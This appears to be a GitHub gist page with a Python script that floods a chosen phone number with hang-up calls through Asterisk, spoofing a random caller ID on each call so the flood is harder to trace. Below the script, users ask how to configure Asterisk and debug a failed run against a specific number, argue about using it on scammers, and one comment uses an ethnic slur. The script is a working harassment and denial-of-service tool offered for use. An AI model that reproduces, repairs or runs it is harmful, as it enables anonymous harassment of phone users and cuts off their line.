-
-
Save rdegges/239891 to your computer and use it in GitHub Desktop.
#!/usr/bin/python | |
""" | |
advanced-flood.py | |
@author: Randall Degges | |
@email: [email protected] | |
@date: 11-20-09 | |
This program floods the specified phone number and spoofs caller ID making it | |
much harder to trace / prevent. | |
""" | |
from time import sleep | |
from sys import argv, exit | |
from pycall.callfile import * | |
from random import seed, randint | |
def genid(): | |
""" | |
Generate a random 10-digit US telephone number for spoofing to. | |
""" | |
return str(randint(1000000000, 9999999999)) | |
def call(num, cid): | |
""" | |
Create a call to the specified number which does nothing except hang up. | |
Also spoofs caller ID to a random 10 digit number. | |
""" | |
testcall = CallFile( | |
trunk_type = 'SIP', | |
trunk_name = 'flowroute', | |
callerid_num = cid, | |
number = num, | |
application = 'Hangup', | |
data = ' ', | |
user = 'asterisk' | |
) | |
testcall.run() | |
def main(): | |
""" | |
Control the application logic. | |
""" | |
seed() # seed the random number generator | |
if len(argv) < 3: | |
print 'Usage: %s [number] [calls-per-minute]' % argv[0] | |
exit(1) | |
number = argv[1] | |
try: | |
cpm = int(argv[2]) | |
except ValueError: | |
cpm = 1 | |
print 'Starting call flood on target: %s. Placing %d calls per minute.' % (number, cpm) | |
count = 1 | |
while True: | |
for x in xrange(cpm): | |
cid = genid() | |
print 'Placing call %d using caller ID %s...' % (count, cid) | |
call(number, cid) | |
count = count + 1 | |
sleep(60) | |
if __name__ == '__main__': | |
""" | |
Program execution begins here. | |
""" | |
main() |
I too have many questions about this code and would love to get some help :)
Yes, you need Asterisk for this. This code is based on a library I wrote that sits on top of Asterisk. It's not really that easy to set up without prior knowledge, it wasn't meant for people to use without a background in using Asterisk. If you'd like to learn how to set that up, etc., read this series I wrote years back called Transparent Telephony:
I'm getting this error:
Jacob-Mac-mini:Desktop kovyjacob$ python3 advanced-flood.py 14372341004 5
Starting call flood on target: 14372341004. Placing 5 calls per minute.
Placing call 1 using caller ID 5944928648...
Traceback (most recent call last):
File "/Users/kovyjacob/Desktop/advanced-flood.py", line 73, in
main()
File "/Users/kovyjacob/Desktop/advanced-flood.py", line 65, in main
call(number, cid)
File "/Users/kovyjacob/Desktop/advanced-flood.py", line 30, in call
testcall = CallFile(
TypeError: init() got an unexpected keyword argument 'trunk_type'
How do I get it to work?
For the same reason vigilantism is illegal (murdering criminals). What is evil and who gets to decide? Would you wreck a family's phone line or internet because their 10 year old son said something in anger at you? Some people would.
tell this shit to your grandma after she's getting scammed by some indian mofo
https://gist.github.com/rdegges/239891?permalink_comment_id=3457096#gistcomment-3457096
thats amazing article. Im reading it. Thanks for sharing
For the same reason vigilantism is illegal (murdering criminals). What is evil and who gets to decide? Would you wreck a family's phone line or internet because their 10 year old son said something in anger at you? Some people would.
tell this shit to your grandma after she's getting scammed by some indian mofo
hows grandma these days
Do i need asterisk? If yes how do i configure it. I installed it but i don't know how to configure it.